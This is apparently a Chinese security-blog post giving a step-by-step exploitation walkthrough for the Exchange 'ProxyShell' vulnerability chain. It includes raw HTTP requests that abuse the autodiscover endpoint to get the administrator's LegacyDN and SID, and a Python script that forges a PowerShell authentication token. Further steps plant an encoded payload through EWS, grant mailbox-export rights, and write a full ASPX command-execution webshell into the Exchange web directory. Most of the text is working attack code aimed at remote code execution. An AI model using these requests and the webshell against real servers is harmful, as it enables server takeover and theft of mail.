记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

Exchange-Proxyshell

2021-08-20 16:55

01

前言

  • 漏洞就不做分析了, 大家可以根据以下步骤去探测是否存在漏洞
  • 有愿意写渗透测试体系化wiki的师傅,可以发邮件至root@edisec.net  (附上基本资料、擅长方向)【内部红包多多 0day多多】
  • Rce 拿webshell
  • 参考来源于orange 等大佬的思路

02

自动化工具





-获取SID 以及token 令牌、自定义webshell_content 生成



03

验证漏洞是否存在

GET /Autodiscover/autodiscover.json?a=Administrator@echod.com/mapi/nspi HTTP/2Host: mail.echod.comCookie: Email=Autodiscover/autodiscover.json?a=Administrator@echod.comCache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"Sec-Ch-Ua-Mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://mail.echod.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.echod.com%2fowa%2f&reason=0Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6Connection: close

04

获取legacyDn

POST /Autodiscover/autodiscover.json?a=Administrator@echod.com/autodiscover/autodiscover.xml HTTP/2Host: mail.echod.comCookie: Email=Autodiscover/autodiscover.json?a=Administrator@echod.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36Content-Type:text/xmlContent-Length: 350
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"> <Request> <EMailAddress>Administrator@echod.com</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> </Request></Autodiscover>

<LegacyDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=95c5d040c67b46f19ad04ac85652e28e-Admin</LegacyDN

05

获取SID

POST /Autodiscover/autodiscover.json?a=Administrator@echod.com/mapi/emsmdb HTTP/2Host: mail.echod.comCookie: Email=Autodiscover/autodiscover.json?a=Administrator@echod.comCache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"Sec-Ch-Ua-Mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Requesttype:ConnectX-Clientinfo:{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}X-Clientapplication:Outlook/15.0.4815.1002X-Requestid:{C715155F-2BE8-44E0-BD34-2960067874C8}:2Content-Type:application/mapi-httpReferer: https://mail.echod.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.echod.com%2fowa%2f&reason=0Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6Connection: closeContent-Length: 150
/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=95c5d040c67b46f19ad04ac85652e28e-Admin+%00%00%00%00%00%e4%04%00%00%09%04%00%00%09%04%00%00%00%00%00%00 【%分号段 要做urldecode】

06

验证powershell 接口

from struct import *import base64def gen_token(uname, sid):    version = 0    ttype = 'Windows'    compressed = 0    auth_type = 'Kerberos'    raw_token = b''    gsid = 'S-1-5-32-544'     version_data = b'V' + (1).to_bytes(1, 'little') + (version).to_bytes(1, 'little')    type_data = b'T' + (len(ttype)).to_bytes(1, 'little') + ttype.encode()    compress_data = b'C' + (compressed).to_bytes(1, 'little')    auth_data = b'A' + (len(auth_type)).to_bytes(1, 'little') + auth_type.encode()    login_data = b'L' + (len(uname)).to_bytes(1, 'little') + uname.encode()    user_data = b'U' + (len(sid)).to_bytes(1, 'little') + sid.encode()    group_data = b'G' + pack('<II', 1, 7) + (len(gsid)).to_bytes(1, 'little') + gsid.encode()    ext_data = b'E' + pack('>I', 0)         raw_token += version_data    raw_token += type_data    raw_token += compress_data    raw_token += auth_data    raw_token += login_data    raw_token += user_data    raw_token += group_data    raw_token += ext_data     data = base64.b64encode(raw_token).decode()     return data
# S-1-5-21-803738369-70637960-3765207648-500print(gen_token("echod\\Administrator","S-1-5-21-803738369-70637960-3765207648-500"))
  • 验证powershell接口返回200
GET /Autodiscover/autodiscover.json?a=Administrator@echod.com/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNlY2hvZFxBZG1pbmlzdHJhdG9yVSpTLTEtNS0yMS04MDM3MzgzNjktNzA2Mzc5NjAtMzc2NTIwNzY0OC01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA= HTTP/2Host: mail.echod.comCookie: Email=Autodiscover/autodiscover.json?a=Administrator@echod.com

07

导出邮件

POST /autodiscover/autodiscover.json?a=mhgod@jjvhk.mrb//EWS/Exchange.asmx HTTP/1.1Host: mail.echod.comAccept-Encoding: gzip, deflateCookie: Email=autodiscover/autodiscover.json?a=mhgod@jjvhk.mrbContent-Type: text/xmlContent-Length: 1645User-Agent: python-urllib3/1.26.6Connection: close
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Header> <t:RequestServerVersion Version="Exchange2016" /> <t:SerializedSecurityContext> <t:UserSid>S-1-5-21-803738369-70637960-3765207648-500</t:UserSid> <t:GroupSids> <t:GroupIdentifier> <t:SecurityIdentifier>S-1-5-21</t:SecurityIdentifier> </t:GroupIdentifier> </t:GroupSids> </t:SerializedSecurityContext> </soap:Header> <soap:Body> <m:CreateItem MessageDisposition="SaveOnly"> <m:Items> <t:Message> <t:Subject>dummy</t:Subject> <t:Body BodyType="HTML">hello from darkness side</t:Body> <t:Attachments> <t:FileAttachment> <t:Name>FileAttachment.txt</t:Name> <t:IsInline>false</t:IsInline> <t:IsContactPhoto>false</t:IsContactPhoto> <t:Content>ldZUhrdpFDnNqQbf96nf2v+CYWdUhrdpFII5hvcGqRT/gtbahqXahoI5uanf2jmp1mlU041pqRT/FIb32tld9wZUFLfTBjm5qd/aKSDTqQ2MyenapanNjL7aXPfa1hR+glSNDYIPa4L3BtapXdqCyTEhlfvWVIa3aRTZ</t:Content> </t:FileAttachment> </t:Attachments> <t:ToRecipients> <t:Mailbox> <t:EmailAddress>Administrator@echod.com</t:EmailAddress> </t:Mailbox> </t:ToRecipients> </t:Message> </m:Items> </m:CreateItem> </soap:Body></soap:Envelope>


SID   EmailAddress  Content


08

草稿邮件

如果在写shell 做验证时,发现shell 报错、可筛选指定的邮件进行导出、即可解决以下报错
编译器错误消息: JS1251: 此方法与该类中的另一方法具有相同的名称和参数类型C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\aC:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\\auth\shell1.aspx

09

添加导出权限

 New-ManagementRoleAssignment -Name "Import Export_Domain Admins" -User "Administrator" -Role "Mailbox Import Export"导出ShellNew-MailboxExportRequest -Mailbox Administrator -FilePath \\192.168.100.194\intepub\xx.aspx

10

Write_Shell

利用New-ExchangeCertificate 进行Webshell 写入
New-ExchangeCertificate -GenerateRequest -RequestFile "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\shell1.aspx" -SubjectName "cn=11111<%@ Page Language='VB' Debug='true' %>`r`n<%@ import Namespace='system.IO' %>`r`n<%@ import Namespace='System.Diagnostics' %>`r`n`r`n<script runat='server'>      `r`nSub RunCmd()            `r`n  Dim myProcess As New Process()            `r`n  Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)            `r`n  myProcessStartInfo.UseShellExecute = false            `r`n  myProcessStartInfo.RedirectStandardOutput = true            `r`n  myProcess.StartInfo = myProcessStartInfo            `r`n  myProcessStartInfo.Arguments=xcmd.text            `r`n  myProcess.Start()            `r`n  Dim myStreamReader As StreamReader = myProcess.StandardOutput            `r`n  Dim myString As String = myStreamReader.Readtoend()            `r`n  myProcess.Close()                       `r`n  result.text= vbcrlf & mystring  `r`nEnd Sub`r`n</script>`r`n`r`n<html>`r`n<body>    `r`n<form runat='server'>        `r`n<p><asp:Label id='L_p' runat='server' width='80px'>Program</asp:Label>        `r`n<asp:TextBox id='xpath' runat='server' Width='300px'>c:\windows\system32\cmd.exe</asp:TextBox>        `r`n<p><asp:Label id='L_a' runat='server' width='80px'>Arguments</asp:Label>        `r`n<asp:TextBox id='xcmd' runat='server' Width='300px' Text='/c whoami'>/c whoami</asp:TextBox>        `r`n<p><asp:Button id='Button' onclick='runcmd' runat='server' Width='100px' Text='Run'></asp:Button>        `r`n<p><asp:Label id='result' runat='server'></asp:Label>       `r`n</form>`r`n</body>`r`n</html><!--" -BinaryEncoded:$true -DomainName example.org

11

cmdlet 权限

Add-ADPermissionAdd-AvailabilityAddressSpaceAdd-ContentFilterPhraseAdd-DatabaseAvailabilityGroupServerAdd-DistributionGroupMemberAdd-FederatedDomainAdd-GlobalMonitoringOverrideAdd-IPAllowListEntryAdd-IPAllowListProviderAdd-IPBlockListEntryAdd-IPBlockListProviderAdd-MailboxDatabaseCopyAdd-MailboxFolderPermissionAdd-MailboxLocationAdd-MailboxPermissionAdd-ManagementRoleEntryAdd-PublicFolderClientPermissionAdd-ResubmitRequestAdd-RoleGroupMemberAdd-ServerMonitoringOverrideClear-ActiveSyncDeviceClear-MobileDeviceClear-TextMessagingAccountCompare-TextMessagingVerificationCodeComplete-MigrationBatchConnect-MailboxDisable-AddressListPagingDisable-AppDisable-CmdletExtensionAgentDisable-DistributionGroupDisable-InboxRuleDisable-JournalRuleDisable-MailboxDisable-MailboxQuarantineDisable-MailContactDisable-MailPublicFolderDisable-MailUserDisable-MalwareFilterRuleDisable-OutlookProtectionRuleDisable-PushNotificationProxyDisable-RemoteMailboxDisable-ServiceEmailChannelDisable-SweepRuleDisable-TransportAgentDisable-TransportRuleDisable-UMAutoAttendantDisable-UMCallAnsweringRuleDisable-UMIPGatewayDisable-UMMailboxDisable-UMServiceDismount-DatabaseDump-ProvisioningCacheEnable-AddressListPagingEnable-AntispamUpdatesEnable-AppEnable-CmdletExtensionAgentEnable-DistributionGroupEnable-ExchangeCertificateEnable-InboxRuleEnable-JournalRuleEnable-MailboxEnable-MailboxQuarantineEnable-MailContactEnable-MailPublicFolderEnable-MailUserEnable-MalwareFilterRuleEnable-OutlookProtectionRuleEnable-PushNotificationProxyEnable-RemoteMailboxEnable-ServiceEmailChannelEnable-SweepRuleEnable-TransportAgentEnable-TransportRuleEnable-UMAutoAttendantEnable-UMCallAnsweringRuleEnable-UMIPGatewayEnable-UMMailboxEnable-UMServiceExport-ActiveSyncLogExport-AutoDiscoverConfigExport-DlpPolicyCollectionExport-ExchangeCertificateExport-JournalRuleCollectionExport-MailboxDiagnosticLogsExport-MessageExport-MigrationReportExport-RecipientDataPropertyExport-TransportRuleCollectionExport-UMCallDataRecordExport-UMPromptGet-AcceptedDomainGet-ActiveSyncDeviceGet-ActiveSyncDeviceAccessRuleGet-ActiveSyncDeviceAutoblockThresholdGet-ActiveSyncDeviceClassGet-ActiveSyncDeviceStatisticsGet-ActiveSyncMailboxPolicyGet-ActiveSyncOrganizationSettingsGet-ActiveSyncVirtualDirectoryGet-AddressBookPolicyGet-AddressListGet-AdminAuditLogConfigGet-AdministrativeUnitGet-ADPermissionGet-ADServerSettingsGet-ADSiteGet-AdSiteLinkGet-AgentLogGet-AgentTrafficTypeSubscriptionGet-AppGet-AuditLogSearchGet-AuthConfigGet-AuthRedirectGet-AuthServerGet-AutodiscoverVirtualDirectoryGet-AvailabilityAddressSpaceGet-AvailabilityConfigGet-CalendarDiagnosticAnalysisGet-CalendarDiagnosticLogGet-CalendarNotificationGet-CalendarProcessingGet-CASMailboxGet-CASMailboxPlanGet-ClassificationRuleCollectionGet-ClientAccessArrayGet-ClientAccessServerGet-ClientAccessServiceGet-CmdletExtensionAgentGet-CommandGet-ComplianceServiceVirtualDirectoryGet-ConsumerGroupGet-ConsumerMailboxGet-ContactGet-ContentFilterConfigGet-ContentFilterPhraseGet-DatabaseAvailabilityGroupGet-DatabaseAvailabilityGroupConfigurationGet-DatabaseAvailabilityGroupNetworkGet-DataClassificationGet-DefaultFolderHistoryGet-DeliveryAgentConnectorGet-DetailsTemplateGet-DistributionGroupGet-DistributionGroupMemberGet-DlpPolicyGet-DlpPolicyTemplateGet-DomainControllerGet-DynamicDistributionGroupGet-EcpVirtualDirectoryGet-EdgeSubscriptionGet-EdgeSyncServiceConfigGet-EligibleDistributionGroupForMigrationGet-EmailAddressPolicyGet-EventLogLevelGet-ExchangeAssistanceConfigGet-ExchangeCertificateGet-ExchangeDiagnosticInfoGet-ExchangeServerGet-ExchangeServerAccessLicenseGet-ExchangeServerAccessLicenseUserGet-FailedContentIndexDocumentsGet-FederatedDomainProofGet-FederatedOrganizationIdentifierGet-FederationInformationGet-FederationTrustGet-ForeignConnectorGet-FrontendTransportServiceGet-GlobalAddressListGet-GlobalMonitoringOverrideGet-GroupGet-HealthReportGet-HelpGet-HostedContentFilterRuleGet-HybridConfigurationGet-ImapSettingsGet-InboxRuleGet-IntraOrganizationConfigurationGet-IntraOrganizationConnectorGet-IPAllowListConfigGet-IPAllowListEntryGet-IPAllowListProviderGet-IPAllowListProvidersConfigGet-IPBlockListConfigGet-IPBlockListEntryGet-IPBlockListProviderGet-IPBlockListProvidersConfigGet-IRMConfigurationGet-JournalRuleGet-LAMDefinitionsGet-LAMResultsGet-LogExportVirtualDirectoryGet-LogonStatisticsGet-MailboxGet-MailboxAuditBypassAssociationGet-MailboxAutoReplyConfigurationGet-MailboxCalendarConfigurationGet-MailboxCalendarFolderGet-MailboxDatabaseGet-MailboxDatabaseCopyStatusGet-MailboxDatabaseRedundancyGet-MailboxDeliveryVirtualDirectoryGet-MailboxFolderGet-MailboxFolderPermissionGet-MailboxFolderStatisticsGet-MailboxJunkEmailConfigurationGet-MailboxLocationGet-MailboxMessageConfigurationGet-MailboxPermissionGet-MailboxPreferredLocationGet-MailboxRegionalConfigurationGet-MailboxRelocationRequestStatisticsGet-MailboxRepairRequestGet-MailboxRestoreRequestGet-MailboxRestoreRequestStatisticsGet-MailboxSearchGet-MailboxServerGet-MailboxServerRedundancyGet-MailboxSpellingConfigurationGet-MailboxStatisticsGet-MailboxTransportServiceGet-MailboxUserConfigurationGet-MailContactGet-MailPublicFolderGet-MailUserGet-MalwareFilteringServerGet-MalwareFilterPolicyGet-MalwareFilterRuleGet-ManagementRoleGet-ManagementRoleAssignmentGet-ManagementRoleEntryGet-ManagementScopeGet-MapiVirtualDirectoryGet-MessageGet-MessageCategoryGet-MessageClassificationGet-MessageTrackingLogGet-MessageTrackingReportGet-MigrationBatchGet-MigrationConfigGet-MigrationEndpointGet-MigrationStatisticsGet-MigrationUserGet-MigrationUserStatisticsGet-MobileDeviceGet-MobileDeviceMailboxPolicyGet-MobileDeviceStatisticsGet-MonitoringItemHelpGet-MonitoringItemIdentityGet-MoveRequestGet-MoveRequestStatisticsGet-MRSRequestGet-MRSRequestStatisticsGet-NetworkConnectionInfoGet-NotificationGet-OabVirtualDirectoryGet-OfflineAddressBookGet-OnlineMeetingConfigurationGet-OrganizationalUnitGet-OrganizationConfigGet-OrganizationRelationshipGet-OutlookAnywhereGet-OutlookProtectionRuleGet-OutlookProviderGet-OutlookServiceVirtualDirectoryGet-OwaMailboxPolicyGet-OwaVirtualDirectoryGet-PartnerApplicationGet-PendingFederatedDomainGet-PhysicalAvailabilityReportGet-PolicyTipConfigGet-PopSettingsGet-PowerShellVirtualDirectoryGet-ProcessInfoGet-PublicFolderGet-PublicFolderClientPermissionGet-PublicFolderDatabaseGet-PublicFolderItemStatisticsGet-PublicFolderMailboxDiagnosticsGet-PublicFolderMailboxMigrationRequestGet-PublicFolderMailboxMigrationRequestStatisticsGet-PublicFolderMigrationRequestGet-PublicFolderMigrationRequestStatisticsGet-PublicFolderMoveRequestGet-PublicFolderMoveRequestStatisticsGet-PublicFolderStatisticsGet-PushNotificationSubscriptionGet-QueueGet-QueueDigestGet-RbacDiagnosticInfoGet-ReceiveConnectorGet-RecipientGet-RecipientFilterConfigGet-RemoteDomainGet-RemoteMailboxGet-ResourceConfigGet-RestVirtualDirectoryGet-ResubmitRequestGet-RetentionPolicyGet-RetentionPolicyTagGet-RMSTemplateGet-RoleAssignmentPolicyGet-RoleGroupGet-RoleGroupMemberGet-RpcClientAccessGet-SearchDocumentFormatGet-SecurityPrincipalGet-SendConnectorGet-SenderFilterConfigGet-SenderIdConfigGet-SenderReputationConfigGet-ServerComponentStateGet-ServerHealthGet-ServerMonitoringOverrideGet-ServiceAvailabilityReportGet-ServiceStatusGet-SettingOverrideGet-SharingPolicyGet-SiteMailboxGet-SiteMailboxDiagnosticsGet-SiteMailboxProvisioningPolicyGet-SmimeConfigGet-StoreUsageStatisticsGet-SubmissionMalwareFilteringServerGet-SweepRuleGet-SyncConfigGet-SystemMessageGet-TextMessagingAccountGet-ThrottlingPolicyGet-ThrottlingPolicyAssociationGet-TimeRangeGet-TransportAgentGet-TransportConfigGet-TransportPipelineGet-TransportRuleGet-TransportRuleActionGet-TransportRulePredicateGet-TransportServerGet-TransportServiceGet-TrustGet-UMActiveCallsGet-UMAutoAttendantGet-UMCallAnsweringRuleGet-UMCallDataRecordGet-UMCallRouterSettingsGet-UMCallSummaryReportGet-UMDialPlanGet-UMHuntGroupGet-UMIPGatewayGet-UMMailboxGet-UMMailboxConfigurationGet-UMMailboxPINGet-UMMailboxPolicyGet-UMPhoneSessionGet-UMServiceGet-UnifiedAuditSettingGet-UserGet-UserPhotoGet-UserPrincipalNamesSuffixGet-WebServicesVirtualDirectoryGet-X400AuthoritativeDomainImport-DlpPolicyCollectionImport-DlpPolicyTemplateImport-ExchangeCertificateImport-JournalRuleCollectionImport-RecipientDataPropertyImport-TransportRuleCollectionImport-UMPromptInstall-TransportAgentInvoke-MonitoringProbeMount-DatabaseMove-ActiveMailboxDatabaseMove-AddressListMove-DatabasePathMove-OfflineAddressBookNew-AcceptedDomainNew-ActiveSyncDeviceAccessRuleNew-ActiveSyncMailboxPolicyNew-ActiveSyncVirtualDirectoryNew-AddressBookPolicyNew-AddressListNew-AdminAuditLogSearchNew-AppNew-AuthRedirectNew-AuthServerNew-AutodiscoverVirtualDirectoryNew-ClassificationRuleCollectionNew-CompliancePolicySyncNotificationNew-ComplianceServiceVirtualDirectoryNew-ConsumerGroupNew-DatabaseAvailabilityGroupNew-DatabaseAvailabilityGroupConfigurationNew-DatabaseAvailabilityGroupNetworkNew-DataClassificationNew-DeliveryAgentConnectorNew-DistributionGroupNew-DlpPolicyNew-DynamicDistributionGroupNew-EcpVirtualDirectoryNew-EdgeSubscriptionNew-EdgeSyncServiceConfigNew-EmailAddressPolicyNew-ExchangeCertificateNew-FederationTrustNew-FingerprintNew-ForeignConnectorNew-GlobalAddressListNew-HybridConfigurationNew-InboxRuleNew-IntraOrganizationConnectorNew-JournalRuleNew-MailboxNew-MailboxAuditLogSearchNew-MailboxDatabaseNew-MailboxDeliveryVirtualDirectoryNew-MailboxFolderNew-MailboxRelocationRequestNew-MailboxRepairRequestNew-MailboxRestoreRequestNew-MailboxSearchNew-MailContactNew-MailMessageNew-MailUserNew-MalwareFilterPolicyNew-MalwareFilterRuleNew-ManagementRoleNew-ManagementRoleAssignmentNew-ManagementScopeNew-MapiVirtualDirectoryNew-MessageClassificationNew-MigrationBatchNew-MigrationEndpointNew-MobileDeviceMailboxPolicyNew-MoveRequestNew-OabVirtualDirectoryNew-OfflineAddressBookNew-OrganizationRelationshipNew-OutlookProtectionRuleNew-OutlookProviderNew-OutlookServiceVirtualDirectoryNew-OwaMailboxPolicyNew-OwaVirtualDirectoryNew-PartnerApplicationNew-PolicyTipConfigNew-PowerShellVirtualDirectoryNew-ProtectionServicePolicyNew-PublicFolderNew-PublicFolderMigrationRequestNew-PublicFolderMoveRequestNew-ReceiveConnectorNew-RemoteDomainNew-RemoteMailboxNew-RestVirtualDirectoryNew-RetentionPolicyNew-RetentionPolicyTagNew-RoleAssignmentPolicyNew-RoleGroupNew-SearchDocumentFormatNew-SendConnectorNew-SettingOverrideNew-SharingPolicyNew-SiteMailboxNew-SiteMailboxProvisioningPolicyNew-SweepRuleNew-SyncMailPublicFolderNew-SystemMessageNew-ThrottlingPolicyNew-TransportRuleNew-UMAutoAttendantNew-UMCallAnsweringRuleNew-UMDialPlanNew-UMHuntGroupNew-UMIPGatewayNew-UMMailboxPolicyNew-WebServicesVirtualDirectoryNew-X400AuthoritativeDomainRedirect-MessageRemove-AcceptedDomainRemove-ActiveSyncDeviceRemove-ActiveSyncDeviceAccessRuleRemove-ActiveSyncDeviceClassRemove-ActiveSyncMailboxPolicyRemove-ActiveSyncVirtualDirectoryRemove-AddressBookPolicyRemove-AddressListRemove-ADPermissionRemove-AppRemove-AuditStubFolderRemove-AuthRedirectRemove-AuthServerRemove-AutodiscoverVirtualDirectoryRemove-AvailabilityAddressSpaceRemove-ClassificationRuleCollectionRemove-CompliancePolicySyncNotificationRemove-ComplianceServiceVirtualDirectoryRemove-ContentFilterPhraseRemove-DatabaseAvailabilityGroupRemove-DatabaseAvailabilityGroupConfigurationRemove-DatabaseAvailabilityGroupNetworkRemove-DatabaseAvailabilityGroupServerRemove-DataClassificationRemove-DeliveryAgentConnectorRemove-DistributionGroupRemove-DistributionGroupMemberRemove-DlpPolicyRemove-DlpPolicyTemplateRemove-DynamicDistributionGroupRemove-EcpVirtualDirectoryRemove-EdgeSubscriptionRemove-EmailAddressPolicyRemove-ExchangeCertificateRemove-FederatedDomainRemove-FederationTrustRemove-ForeignConnectorRemove-GlobalAddressListRemove-GlobalMonitoringOverrideRemove-HybridConfigurationRemove-InboxRuleRemove-IntraOrganizationConnectorRemove-IPAllowListEntryRemove-IPAllowListProviderRemove-IPBlockListEntryRemove-IPBlockListProviderRemove-JournalRuleRemove-MailboxRemove-MailboxDatabaseRemove-MailboxDatabaseCopyRemove-MailboxDeliveryVirtualDirectoryRemove-MailboxFolderPermissionRemove-MailboxLocationRemove-MailboxPermissionRemove-MailboxRepairRequestRemove-MailboxRestoreRequestRemove-MailboxSearchRemove-MailboxUserConfigurationRemove-MailContactRemove-MailUserRemove-MalwareFilterPolicyRemove-MalwareFilterRuleRemove-ManagementRoleRemove-ManagementRoleAssignmentRemove-ManagementRoleEntryRemove-ManagementScopeRemove-MapiVirtualDirectoryRemove-MessageRemove-MessageClassificationRemove-MigrationBatchRemove-MigrationEndpointRemove-MigrationUserRemove-MobileDeviceRemove-MobileDeviceMailboxPolicyRemove-MoveRequestRemove-MRSRequestRemove-OabVirtualDirectoryRemove-OfflineAddressBookRemove-OrganizationRelationshipRemove-OutlookProtectionRuleRemove-OutlookProviderRemove-OutlookServiceVirtualDirectoryRemove-OwaMailboxPolicyRemove-OwaVirtualDirectoryRemove-PartnerApplicationRemove-PolicyTipConfigRemove-PowerShellVirtualDirectoryRemove-PublicFolderRemove-PublicFolderClientPermissionRemove-PublicFolderMailboxMigrationRequestRemove-PublicFolderMigrationRequestRemove-PublicFolderMoveRequestRemove-PushNotificationSubscriptionRemove-ReceiveConnectorRemove-RemoteDomainRemove-RemoteMailboxRemove-RestVirtualDirectoryRemove-ResubmitRequestRemove-RetentionPolicyRemove-RetentionPolicyTagRemove-RoleAssignmentPolicyRemove-RoleGroupRemove-RoleGroupMemberRemove-SearchDocumentFormatRemove-SendConnectorRemove-ServerMonitoringOverrideRemove-SettingOverrideRemove-SharingPolicyRemove-SiteMailboxProvisioningPolicyRemove-StoreMailboxRemove-SweepRuleRemove-SyncMailPublicFolderRemove-SystemMessageRemove-ThrottlingPolicyRemove-TransportRuleRemove-UMAutoAttendantRemove-UMCallAnsweringRuleRemove-UMDialPlanRemove-UMHuntGroupRemove-UMIPGatewayRemove-UMMailboxPolicyRemove-UserPhotoRemove-WebServicesVirtualDirectoryRemove-X400AuthoritativeDomainReset-ProvisioningCacheRestore-DatabaseAvailabilityGroupRestore-DetailsTemplateResume-MailboxDatabaseCopyResume-MailboxExportRequestResume-MailboxRestoreRequestResume-MessageResume-MoveRequestResume-MRSRequestResume-PublicFolderMailboxMigrationRequestResume-PublicFolderMigrationRequestResume-PublicFolderMoveRequestResume-QueueRetry-QueueSearch-AdminAuditLogSearch-MailboxAuditLogSearch-MessageTrackingReportSend-TextMessagingVerificationCodeSet-AcceptedDomainSet-ActiveSyncDeviceAccessRuleSet-ActiveSyncDeviceAutoblockThresholdSet-ActiveSyncMailboxPolicySet-ActiveSyncOrganizationSettingsSet-ActiveSyncVirtualDirectorySet-AddressBookPolicySet-AddressListSet-AdminAuditLogConfigSet-ADServerSettingsSet-ADSiteSet-AdSiteLinkSet-AppSet-AuthConfigSet-AuthRedirectSet-AuthServerSet-AutodiscoverVirtualDirectorySet-AvailabilityConfigSet-CalendarNotificationSet-CalendarProcessingSet-CASMailboxSet-ClassificationRuleCollectionSet-ClientAccessServerSet-ClientAccessServiceSet-CmdletExtensionAgentSet-CompliancePolicySyncTenantInfoSet-ComplianceServiceVirtualDirectorySet-ConsumerGroupSet-ConsumerMailboxSet-ContactSet-ContentFilterConfigSet-DatabaseAvailabilityGroupSet-DatabaseAvailabilityGroupConfigurationSet-DatabaseAvailabilityGroupNetworkSet-DataClassificationSet-DeliveryAgentConnectorSet-DetailsTemplateSet-DistributionGroupSet-DlpPolicySet-DynamicDistributionGroupSet-EcpVirtualDirectorySet-EdgeSyncServiceConfigSet-EmailAddressPolicySet-EventLogLevelSet-ExchangeAssistanceConfigSet-ExchangeServerSet-FederatedOrganizationIdentifierSet-FederationTrustSet-ForeignConnectorSet-FrontendTransportServiceSet-GlobalAddressListSet-GroupSet-HybridConfigurationSet-ImapSettingsSet-InboxRuleSet-IntraOrganizationConnectorSet-IPAllowListConfigSet-IPAllowListProviderSet-IPAllowListProvidersConfigSet-IPBlockListConfigSet-IPBlockListProviderSet-IPBlockListProvidersConfigSet-IRMConfigurationSet-JournalRuleSet-LogExportVirtualDirectorySet-MailboxSet-MailboxAuditBypassAssociationSet-MailboxAutoReplyConfigurationSet-MailboxCalendarConfigurationSet-MailboxCalendarFolderSet-MailboxDatabaseSet-MailboxDatabaseCopySet-MailboxDeliveryVirtualDirectorySet-MailboxFolderPermissionSet-MailboxJunkEmailConfigurationSet-MailboxLocationSet-MailboxMessageConfigurationSet-MailboxRegionalConfigurationSet-MailboxRelocationRequestSet-MailboxRestoreRequestSet-MailboxSearchSet-MailboxServerSet-MailboxSpellingConfigurationSet-MailboxTransportServiceSet-MailContactSet-MailPublicFolderSet-MailUserSet-MalwareFilteringServerSet-MalwareFilterPolicySet-MalwareFilterRuleSet-ManagementRoleAssignmentSet-ManagementRoleEntrySet-ManagementScopeSet-MapiVirtualDirectorySet-MessageClassificationSet-MigrationBatchSet-MigrationConfigSet-MigrationEndpointSet-MobileDeviceMailboxPolicySet-MoveRequestSet-NotificationSet-OabVirtualDirectorySet-OfflineAddressBookSet-OrganizationSet-OrganizationConfigSet-OrganizationRelationshipSet-OutlookAnywhereSet-OutlookProtectionRuleSet-OutlookProviderSet-OutlookServiceVirtualDirectorySet-OwaMailboxPolicySet-OwaVirtualDirectorySet-PartnerApplicationSet-PendingFederatedDomainSet-PolicyTipConfigSet-PopSettingsSet-PowerShellVirtualDirectorySet-ProtectionServicePolicySet-PublicFolderSet-PublicFolderMailboxMigrationRequestSet-PublicFolderMigrationRequestSet-PublicFolderMoveRequestSet-ReceiveConnectorSet-RecipientFilterConfigSet-RemoteDomainSet-RemoteMailboxSet-ResourceConfigSet-RestVirtualDirectorySet-ResubmitRequestSet-RetentionPolicySet-RetentionPolicyTagSet-RoleAssignmentPolicySet-RoleGroupSet-RpcClientAccessSet-SearchDocumentFormatSet-SendConnectorSet-SenderFilterConfigSet-SenderIdConfigSet-SenderReputationConfigSet-ServerComponentStateSet-ServerMonitorSet-SettingOverrideSet-SharingPolicySet-SiteMailboxSet-SiteMailboxProvisioningPolicySet-SmimeConfigSet-SubmissionMalwareFilteringServerSet-SweepRuleSet-SystemMessageSet-TextMessagingAccountSet-ThrottlingPolicySet-ThrottlingPolicyAssociationSet-TransportAgentSet-TransportConfigSet-TransportRuleSet-TransportServerSet-TransportServiceSet-UMAutoAttendantSet-UMCallAnsweringRuleSet-UMCallRouterSettingsSet-UMDialPlanSet-UMIPGatewaySet-UMMailboxSet-UMMailboxConfigurationSet-UMMailboxPINSet-UMMailboxPolicySet-UMServiceSet-UnifiedAuditSettingSet-UserSet-UserPhotoSet-WebServicesVirtualDirectorySet-X400AuthoritativeDomainStart-AuditAssistantStart-DatabaseAvailabilityGroupStart-EdgeSynchronizationStart-ManagedFolderAssistantStart-MigrationBatchStart-UMPhoneSessionStop-DatabaseAvailabilityGroupStop-ManagedFolderAssistantS